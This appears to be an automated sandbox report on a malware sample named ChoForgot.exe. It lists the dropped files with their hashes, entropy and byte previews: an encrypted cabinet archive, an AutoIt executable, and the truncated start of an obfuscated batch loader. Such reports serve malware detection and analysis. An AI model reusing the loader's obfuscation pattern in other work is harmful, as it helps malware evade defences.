                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):62464
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.65943189347368
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:mWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvY464qvI93L:mWf05mjccBiqXvpgF4qv+3L
                                                                                                                                                                                                                                                                                                      MD5:BBE29E56FFE75996E8CA9090D7D77F90
                                                                                                                                                                                                                                                                                                      SHA1:D9AA67C8D72E772A80A5FE91B5FA2055ABD7F703
                                                                                                                                                                                                                                                                                                      SHA-256:09EF3302B1439CE599D2ABA0D63131A3C4DCBCBA50A37ABF97D700F120E5FCC1
                                                                                                                                                                                                                                                                                                      SHA-512:F0270133761B242495F079A91625EE365D2E9B127DE3ECC773F0228FDF6E874B53ECFC09AB81EE7C5B0B8C5EDBA99CA74017692D032C0BA520951B92D267CF3E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.963581589456672
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:oWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2J:oWy4ZNoGmROL7F1G7ho2J
                                                                                                                                                                                                                                                                                                      MD5:EE05BE18D113EB275F51315FB037F70D
                                                                                                                                                                                                                                                                                                      SHA1:7869C95E14B3B7F62DCFF7F1F2466176AF343CD5
                                                                                                                                                                                                                                                                                                      SHA-256:0F914BBE769AA4E7B0E26E0FA78714A7213050EF3907CCFA4A1488CE3B20DF45
                                                                                                                                                                                                                                                                                                      SHA-512:0C857DF0F87B7B4B53492AA743064C11335D1D99AE82D4EA252048D3B7550174224212DC9EE15B075BE371B84FD17A5EE3CF1C7094FD0586D90E9F88B2A46045
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, 488066 bytes, 12 files, at 0x2c +A "Wal" +A "Trademarks", ID 8707, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):488066
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.998646355083256
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:2EG/Vvvu1MhaeoSbpSAsYXr7SjJBNITh2Lf3MboDT4:2Ecv2i1SAnXr7SjJOh2Lfc+M
                                                                                                                                                                                                                                                                                                      MD5:C83A25D37C14B33C8C977950706E4087
                                                                                                                                                                                                                                                                                                      SHA1:6116CF0A57BE99402DB4C76F72751E33D45B055F
                                                                                                                                                                                                                                                                                                      SHA-256:D84347B22E026490EDB739141CD5AEE2E1A97EE6050E07B93DF005A61EC29F6F
                                                                                                                                                                                                                                                                                                      SHA-512:78EC95011F8BA59A734BC2706CB311201DA0014863B374BB9431394D716095887CD1A923DD39442DA8D5D0BA9FA6976E1EADF4EAA836E9C6583D322F9DD55C8F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MSCF.....r......,................"..L..................Y.m .Wal..\.........Y.m .Trademarks.. ...8.....Y.m .Malawi......X.....Y.m .Improve..X...u.....Y.m .Publicity............Y.m .Wordpress............Y.m .Ix.....\......Y.m .Belt..H..\......Y.m .Ensures.....\(.....Y.m .Convergence.....\(.....Y.m .Gradually..X..\......Y.m .Fitting...][.T..CK}..\TU.8~...U..`TX.cQZ.....(.X.C.......~.t&m...r<..w.m{5.]k.]...jm..0]Es..6.=4la..J...<w@.......s.=/.9.9..y..]...I.....[..<.....(\M...k!.[..x... .d......)|..W)|...........; b*_.T.....W^..,Yy.?#d..."G..<.~.g9.G..x...."1......%.-U.'.d...+.E.MR)/T.H.p....L~B.S......w...".:ER...b<q....vV.=.U+.x...gC........\.J.....3...`..;.U[t_Z.."NX%.e...6%....kr..y..h.3U...+.3..W..6..|-.....J.p$..\.OY..H'@........u.q.$y...|.W.}..].n..n.W<^..;y.G.....`..6..A....V...P..*.}!$qy+......Rx..............2..&.....1..3I.Q.`;D..a......1..*.eP,.bT~..b...%.F...3>.+i.J.._t...|...6.xD.\..:.G.I..)X....T.Kr6..&W..}."1...J..$>].S..(.....h.u....=`R....`
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):83968
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25645948726194
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:FKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qcH:FKaj6iTcPAsAhxjgarB/5el3EYrG
                                                                                                                                                                                                                                                                                                      MD5:9055CD07EBC236D6A9ED59A00976303F
                                                                                                                                                                                                                                                                                                      SHA1:B55EF932607C144E36B6729F59A0DF49AF31C546
                                                                                                                                                                                                                                                                                                      SHA-256:D08694349BC677E90FE0D2E398D84022057B042C386D861273E6B7339F532249
                                                                                                                                                                                                                                                                                                      SHA-512:9344045948B93C8305703E9E5E2ED6BB58535028AD58881E06727AE88B058E19E25FD7E790739383B1A3E1B2F11F73AFAC7FD9DCA7BB677CC90DA426D3996ABE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):88064
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.662395544107781
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:+r5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLo:M0nEoXnmowS2u5hVOoQ7t8T6pUkBJR84
                                                                                                                                                                                                                                                                                                      MD5:AD99FA74F69F99F32FA2D01579BF7080
                                                                                                                                                                                                                                                                                                      SHA1:0B94621B4C8D976DE408E736811AF2A2B231DD85
                                                                                                                                                                                                                                                                                                      SHA-256:50D7F8DA31679BB21DD88A973C03EA2D5DA501F7B241A740BC1FA98C5B53CCBB
                                                                                                                                                                                                                                                                                                      SHA-512:77AE1948F088ABD47AB53D8C228DFF2B0479F73A455CC33A4F2AD3BF8F855579FC07A1D6E962C4D822DE63FE3E0B01973B7D1608F12BD6893A04EC9619B9C10B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1031), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25627
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.114528855156142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:SGOEI0d+AeTq4a+op/8O60bx1BuzHOhgDMf7:SGz3+AWq4hg8O60bdoUp
                                                                                                                                                                                                                                                                                                      MD5:2CBBA7BA80508761F55FFD4BEB853102
                                                                                                                                                                                                                                                                                                      SHA1:FE71788DCA26E77F22548FFC39F01BC8F55D2823
                                                                                                                                                                                                                                                                                                      SHA-256:B5F643DB2B4DFC24718865707806F6DD22D9A54EAE16A603C7FEFFE9D98B49CE
                                                                                                                                                                                                                                                                                                      SHA-512:14AB42B3B60D7E7032B0836D0A53670A2D231200121DA5618B06962A401903720A736DF28D049F7CB3FE21E8DA09ACC6DAFAE5B86BB6AFBD79307D99B80C6C09
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Set Eden=l..LSThinkpad-Reprint-Reid-..lUKPh-Hispanic-Anniversary-Savings-Transexual-..KejcCases-Walnut-Tommy-..SreSAssumed-Presently-..LjLos-Services-Costumes-Merit-Bankruptcy-Dj-..UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-..Set Machine=D..NiyvElection-Bradford-Road-Cube-Accordance-Changes-Compact-..xkTracks-Scene-Acm-Amateur-Gel-..eqfDc-Provision-Contributing-..vyPromotional-..ZlNQNasa-Facility-..uXdWagner-Started-Systems-Governing-..Set Transexuales=C..zFqaAdditional-Realize-Displayed-Reasonably-Joining-..KfFPrince-Pledge-Pump-Presented-Compressed-..CnReduction-Sperm-Anymore-Announced-Errors-Attacks-Behavior-Canada-Graphs-..SoCargo-Beam-Teach-Further-Washer-Mall-Numbers-..pKCh-Gregory-Paragraphs-Wedding-Maximize-Actress-..RuyGWatches-Prediction-Victims-Pics-Grass-Graphs-Essays-..Set Eg=7..yAnRainbow-Toronto-Offer-..veggResident-Secrets-Adventure-Entitled-Before-Charitable-Nuke-Essentially-Failure-..pQtIInfections-Refrigerator-Dl-Virtual-Activity-Bias-..twZVbulletin-Menu
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1031), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25627
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.114528855156142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:SGOEI0d+AeTq4a+op/8O60bx1BuzHOhgDMf7:SGz3+AWq4hg8O60bdoUp
                                                                                                                                                                                                                                                                                                      MD5:2CBBA7BA80508761F55FFD4BEB853102
                                                                                                                                                                                                                                                                                                      SHA1:FE71788DCA26E77F22548FFC39F01BC8F55D2823
                                                                                                                                                                                                                                                                                                      SHA-256:B5F643DB2B4DFC24718865707806F6DD22D9A54EAE16A603C7FEFFE9D98B49CE
                                                                                                                                                                                                                                                                                                      SHA-512:14AB42B3B60D7E7032B0836D0A53670A2D231200121DA5618B06962A401903720A736DF28D049F7CB3FE21E8DA09ACC6DAFAE5B86BB6AFBD79307D99B80C6C09
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Set Eden=l..LSThinkpad-Reprint-Reid-..lUKPh-Hispanic-Anniversary-Savings-Transexual-..KejcCases-Walnut-Tommy-..SreSAssumed-Presently-..LjLos-Services-Costumes-Merit-Bankruptcy-Dj-..UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-..Set Machine=D..NiyvElection-Bradford-Road-Cube-Accordance-Changes-Compact-..xkTracks-Scene-Acm-Amateur-Gel-..eqfDc-Provision-Contributing-..vyPromotional-..ZlNQNasa-Facility-..uXdWagner-Started-Systems-Governing-..Set Transexuales=C..zFqaAdditional-Realize-Displayed-Reasonably-Joining-..KfFPrince-Pledge-Pump-Presented-Compressed-..CnReduction-Sperm-Anymore-Announced-Errors-Attacks-Behavior-Canada-Graphs-..SoCargo-Beam-Teach-Further-Washer-Mall-Numbers-..pKCh-Gregory-Paragraphs-Wedding-Maximize-Actress-..RuyGWatches-Prediction-Victims-Pics-Grass-Graphs-Essays-..Set Eg=7..yAnRainbow-Toronto-Offer-..veggResident-Secrets-Adventure-Entitled-Before-Charitable-Nuke-Essentially-Failure-..pQtIInfections-Refrigerator-Dl-Virtual-Activity-Bias-..twZVbulletin-Menu
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):128000
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.644899820682716
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:M80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnw:xSCOMVIPPL/sZ7HS3zcNPw
                                                                                                                                                                                                                                                                                                      MD5:B472C3173839488298C86F463853D522
                                                                                                                                                                                                                                                                                                      SHA1:4EA19E681D58DBD02318522523117290E5C34F64
                                                                                                                                                                                                                                                                                                      SHA-256:0FF238B71B54C5F33F282CA1E5C3D448BDC37AD8E67EF818766EAF965EE39B8D
                                                                                                                                                                                                                                                                                                      SHA-512:6B1A0B419229C0E101624D293640E12CA15DE1063EA1ED8F1223072C5071CD952D57E2D7FE88E7F68B295E52B899B3773545B6E7E4FC127D0742814EB2A645E8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):7591
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.602639969665376
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:XAH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:wrVEVFJ8ZcGwGBk7/UMQ3rw
                                                                                                                                                                                                                                                                                                      MD5:9748FF1C8DD58352459F2451049AF2A2
                                                                                                                                                                                                                                                                                                      SHA1:C0A19F1E749FA58BC03B7207D1BE88D054C6C16D
                                                                                                                                                                                                                                                                                                      SHA-256:F6D4C8EBB3C24D734F4888DF2CECA12F2836BB999F58E78DCD05CFF4B27C135B
                                                                                                                                                                                                                                                                                                      SHA-512:3EB9D6BEAC6EA2C1FD8ECFCBCF159459B0B236B2C997191E84DA058D5162CC9A77D132EBC42FDE26891E13959DDC2A81BC8CC47C97111E42C7E5BA4E6E33EE9F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...U.%..0...+.......0...U.#..0....:..t-..s....I?..T0...U.......J....F3...1..u...v0...*.H.............{m....p+......)r..)..9...t.Qg..Y.....[A.......|k..H;.^q..w.WP......2lnF.;....}.......X....&-`.d...H*}.)..f..+....";Y.}..#....). .%|.X.[.....tgo..!sN....9v.\...|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0...*.H......1...+.....7...0...+.....7...1.0...+.....7...0/..*.H......1". .g.6..l....#..t.X..n|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0...*.H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......|.aH|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&..*.b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0.
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.749227871603261
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:/yGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+JvUl:c9n9mTsCNvEQH5O5U1nPKrhBzMl
                                                                                                                                                                                                                                                                                                      MD5:9ADB0CA1567F35D30C412CBE89A53027
                                                                                                                                                                                                                                                                                                      SHA1:A32E1D9EB580CE408943B1D91372091967B18BE9
                                                                                                                                                                                                                                                                                                      SHA-256:29B99F845B00EA87A7DA8B57001BF0561D5C87EBDDA8CAEFAA3248EDD7C87DCA
                                                                                                                                                                                                                                                                                                      SHA-512:986234C956D90C732656DD16DE58B528AF17040364311F89F8D98A45736A7DD9C6394D4C36028B73575DED030654A84512711FA14153F079284508E964F40DA6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Duck........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B............................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):76800
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.9974146672703545
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:8oWaK5pdcNjDuej3zspnOXasnVYTnOBihq50CYnO7:8rauMFpzGRsVYrOVbYO7
                                                                                                                                                                                                                                                                                                      MD5:4F00E7D3C58AB52D2C6E8B6935B14E0D
                                                                                                                                                                                                                                                                                                      SHA1:634AAEF4C09CC4F8BE78C7A8D1B7CB72F184C073
                                                                                                                                                                                                                                                                                                      SHA-256:1629FDA7C2ACC6E2C91B128FCD713EFC4282FE6AC169D3804F639C16957EFFF0
                                                                                                                                                                                                                                                                                                      SHA-512:64873A21E2C0A581F9AB4FF6933FABCF117860998E73227340D0666D2C0E7017DE8F57DB8216DD643F9DAF8C11CE73EEF41E986E55EE7B64AAD30435A6D5BDE1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):57344
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996875195710972
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:63o9On+rvzpKXyVh3jr4fOmfqAUgr4L34:649On+rvdhH4Rgg2o
                                                                                                                                                                                                                                                                                                      MD5:8DAAC6F10E63C4E0B8DDDECAF6B8E0EF
                                                                                                                                                                                                                                                                                                      SHA1:39441368910496DC889FE74AE20963E53F08A459
                                                                                                                                                                                                                                                                                                      SHA-256:3A479C5821FCE8189CA2D04B48F7078F2266E8FD80E57CA4B6F4B9B2B724B26F
                                                                                                                                                                                                                                                                                                      SHA-512:7064CD9BBAC4F9B792528B98B1F86BB9A283481F16C85A792D34C0D2F30A9BC4200CDF12EADFFFC6720EF64B2DF4187828DC7DF0E836AEB7BB2AB6CCD022C93C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):139264
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7469999325978085
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:Xh6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPf:xq8QLeAg0Fuz08XvBNbjaAtsPf
                                                                                                                                                                                                                                                                                                      MD5:6567D0C4ACA999258D881932A4A6925A
                                                                                                                                                                                                                                                                                                      SHA1:C82D413AA3D63F8B540F5EC85CB6993323C80A39
                                                                                                                                                                                                                                                                                                      SHA-256:B54A2AB660D285AF9F9E829D97A7550B1640803C1BEA965E747E92CB29A54CA3
                                                                                                                                                                                                                                                                                                      SHA-512:4CB7FA0C47009134D29523CFA005541EEB4F755BB884117A25983F3C92BD69A7D4F6499429074F5F9FF0597E4ABC1C08CD804F78BCBB694D84F1BB522EFC5DBA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...R.E.G.D.E.L.E.T.E...S.T.R.I.N.G.L.E.N...I.N.I.D.E.L.E.T.E...T.C.P.A.C.C.E.P.T...H.O.T.K.E.Y.S.E.T...T.I.M.E.R.I.N.I.T...S.P.L.A.S.H.O.F.F...W.I.N.F.L.A.S.H.....F.I.L.E.M.O.V.E.....I.S.S.T.R.I.N.G.....O.B.J.E.V.E.N.T.....D.L.L.C.L.O.S.E.....I.N.I.W.R.I.T.E.....I.S.B.I.N.A.R.Y.....B.I.T.S.H.I.F.T.....W.I.N.C.L.O.S.E.....R.E.G.W.R.I.T.E.....I.N.P.U.T.B.O.X.....I.S.N.U.M.B.E.R.....S.H.U.T.D.O.W.N.....F.U.N.C.N.A.M.E.....F.I.L.E.O.P.E.N.....F.I.L.E.C.O.P.Y.....I.N.E.T.R.E.A.D.....S.E.T.E.R.R.O.R.....F.I.L.E.R.E.A.D.....C.E.I.L.I.N.G...W.I.N.M.O.V.E...R.U.N.W.A.I.T...T.O.O.L.T.I.P...W.I.N.K.I.L.L...D.I.R.C.O.P.Y...U.D.P.O.P.E.N...U.D.P.S.E.N.D...R.E.G.R.E.A.D...I.N.I.R.E.A.D...I.S.A.R.R.A.Y...W.I.N.W.A.I.T...T.C.P.R.E.C.V...O.B.J.N.A.M.E...D.L.L.O.P.E.N...E.X.E.C.U.T.E...I.S.F.L.O.A.T...D.L.L.C.A.L.L...U.D.P.R.E.C.V...W.I.N.L.I.S.T...I.S.A.D.M.I.N...C.L.I.P.G.E.T...I.N.E.T.G.E.T...U.D.P.B.I.N.D...D.I.R.M.O.V.E...C.L.I.P.P.U.T...S.R.A.N.D.O.M...M.O.U.S.E.U.P...M.A.P.K.E.Y.S...T.C.P.S.E.N.D
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):64827
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996856640307497
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:04KOkg9KF7yMj2rpQ4oiS+WwWmw1EHw29A:fkgwFGe2ZBr9rQz
                                                                                                                                                                                                                                                                                                      MD5:D46DF033B2AFD716F44E8E9482B0C3F1
                                                                                                                                                                                                                                                                                                      SHA1:058928CF46326C10F4F11BC817C387F4A3AD1A49
                                                                                                                                                                                                                                                                                                      SHA-256:D96C4CC9B7C57E3999B16A9CE661208B6D7782C6D12D9B7054CF737A18765D11
                                                                                                                                                                                                                                                                                                      SHA-512:2436C4733B94A8B8EC58D321FA4533AF7AD1CAE69BD4B5E7CB4E7D50B00FB369FD421664F0F1851F7634CBA86E6ED81622C3099974CED2D81A9279616BAB4F46
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):88064
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.712983512179883
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:KeOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdnp:KeOyKODOSpQSAU4CE0Imbp
                                                                                                                                                                                                                                                                                                      MD5:FF2CEEC537D5B6F00E079F35A28ECA2F
                                                                                                                                                                                                                                                                                                      SHA1:02E6B54BF4BB40E8AA2E633331F1A6FCB8E4FD43
                                                                                                                                                                                                                                                                                                      SHA-256:A42A43439F637DB2CD812FCF086388808BBF5DD103E7E7D20590707D0C38597E
                                                                                                                                                                                                                                                                                                      SHA-512:26BFA8B19D875D41601F538A99D4EAA0FC04388F6D0689E2B4D22607AAC5261E03E42D2E2804690CE1D6FC3A9317A969B1D0D94568CBD6A73843E7FDEFC1989B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):89088
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.388500801928956
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:2ueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfvW:2ueoMmOqDoioO5bLezW9FfTut/Dde6u7
                                                                                                                                                                                                                                                                                                      MD5:0D9676B0ACE617D2F4B1E3D382FFF695
                                                                                                                                                                                                                                                                                                      SHA1:5B60C826A38C70430BAB8017B76A27D945FBDBE3
                                                                                                                                                                                                                                                                                                      SHA-256:738D4B9E1C15109B85D7F0A06748DCF4EC018A0EF4ABE917552F59A84AE6C03D
                                                                                                                                                                                                                                                                                                      SHA-512:B81D208D807634B9BE1FC42F036FD4DA41E50F84EDD232B736F8588B22C5A4CF7534196CE6C873F2E9BAB264AD4A11A9F5CBD3E6037E85DAE58E766E81369188
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):121856
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.331012340919701
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:iZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDt:iK5vPeDkjGgQaE/loUDt
                                                                                                                                                                                                                                                                                                      MD5:19046E554A09E864445F82438D104A1A
                                                                                                                                                                                                                                                                                                      SHA1:0706E729F7A4E535050DFF2B2830781AFC47D38E
                                                                                                                                                                                                                                                                                                      SHA-256:05F50AB0792F99E7D107EC120F436A093D94D97B75BCDE861E19FA29F842C8F1
                                                                                                                                                                                                                                                                                                      SHA-512:2C9C9385BCEC66BA5DD11DFF14E383F72FC67E3BE3F3529CBAE8B2A4741F13B1B931A692C4B6F7BA2A5A0A9958141F7E6100D0EA631FEEE887FA6D279AD2E24A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):71680
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.5689247031942015
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:9PrpmESvn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhj2:hpmESv+AqVnBypIbv18mLthfhS
                                                                                                                                                                                                                                                                                                      MD5:DE0BE63D4A9CD3B9D4137EC3C72D0951
                                                                                                                                                                                                                                                                                                      SHA1:19F744279539DD41F4E591C5EFE35101F3A7F5BC
                                                                                                                                                                                                                                                                                                      SHA-256:6F2D36E5713CD1A319A8CE22171B16C95C9D0C3D7F75FF6A93E1EBDF19DC8977
                                                                                                                                                                                                                                                                                                      SHA-512:3AB18E5DE48AD1AFF696855A7925D32F2E3FA3682F9CD421D7337CAA9B35C9F3070B75C20711BE9E016959FA8ED17176CC3FCCF5AF8BB2304EDC57FBF37B4B82
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):31335
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                      MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                      SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                      SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
